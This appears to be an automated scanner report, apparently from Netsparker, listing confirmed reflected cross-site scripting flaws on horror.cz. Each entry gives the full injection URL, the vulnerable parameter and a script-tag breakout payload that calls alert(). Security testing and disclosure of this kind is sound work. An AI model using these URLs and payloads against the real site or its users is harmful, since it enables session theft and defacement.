horror.cz

1. XSS (Cross-site Scripting)
2.  
3. Severity: Important
4. Confirmation: Confirmed
5. URL: http://www.horror.cz/index.php?str=profil&str2='"--></style></script><script>alert(0x0002C4)</script>
6. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
7. Parameter Name: str2
8. Parameter Type: Querystring
9. Attack Pattern: '"--></style></script><script>alert(0x0002C4)</script>
10.  
11. Severity: Important
12. Confirmation: Confirmed
13. URL: http://www.horror.cz/index.php?str=kontakt&jmeno=3&email=\'\"--></style></script><script>netsparker(0x000A83)</script>&telefon=&zprava=3&odeslano=spamNE
14. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
15. Parameter Name: email
16. Parameter Type: Post
17. Attack Pattern: '"--></style></script><script>alert(0x000A83)</script>
18.  
19. Severity: Important
20. Confirmation: Confirmed
21. URL: http://www.horror.cz/index.php?str=kontakt&jmeno=\'\"--></style></script><script>netsparker(0x000A93)</script>&email=netsparker@example.com&telefon=&zprava=3&odeslano=spamNE
22. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
23. Parameter Name: jmeno
24. Parameter Type: Post
25. Attack Pattern: '"--></style></script><script>alert(0x000A93)</script>
26.  
27. Severity: Important
28. Confirmation: Confirmed
29. URL: http://www.horror.cz/index.php?str=profil&str2=\'\"--></style></script><script>netsparker(0x000C6E)</script>&prijemce='"--></style></script><script>alert(0x000C6E)</script>
30. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
31. Parameter Name: prijemce
32. Parameter Type: Querystring
33. Attack Pattern: '"--></style></script><script>alert(0x000C6E)</script>
34.  
35. Severity: Important
36. Confirmation: Confirmed
37. URL: http://www.horror.cz/index.php?str=profil&page=1&str2='"--></style></script><script>alert(0x000D26)</script>&rubrika=3
38. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
39. Parameter Name: str2
40. Parameter Type: Querystring
41. Attack Pattern: '"--></style></script><script>alert(0x000D26)</script>
42.  
43. Severity: Important
44. Confirmation: Confirmed
45. URL: http://www.horror.cz/index.php?str=profil&str2='"--></style></script><script>alert(0x000D4E)</script>
46. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
47. Parameter Name: str2
48. Parameter Type: Querystring
49. Attack Pattern: '"--></style></script><script>alert(0x000D4E)</script>
50.  
51. Severity: Important
52. Confirmation: Confirmed
53. URL: http://www.horror.cz/index.php?str=kontakt&jmeno=3&email=netsparker@example.com&telefon=&zprava=\'\"--></style></script><script>netsparker(0x000C03)</script>&odeslano=spamNE
54. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
55. Parameter Name: zprava
56. Parameter Type: Post
57. Attack Pattern: '"--></style></script><script>alert(0x000C03)</script>
58.  
59. Severity: Important
60. Confirmation: Confirmed
61. URL: http://www.horror.cz/UserArea/index.php?str=uzivatel-detail&kdo='"--></style></script><script>alert(0x00A934)</script>
62. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
63. Parameter Name: kdo
64. Parameter Type: Querystring
65. Attack Pattern: '"--></style></script><script>alert(0x00A934)</script>
66.  
67. Severity: Important
68. Confirmation: Confirmed
69. URL: http://www.horror.cz/UserArea/index.php?str=uzivatel-detail&page=1&kdo='"--></style></script><script>alert(0x00C727)</script>
70. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
71. Parameter Name: kdo
72. Parameter Type: Querystring
73. Attack Pattern: '"--></style></script><script>alert(0x00C727)</script>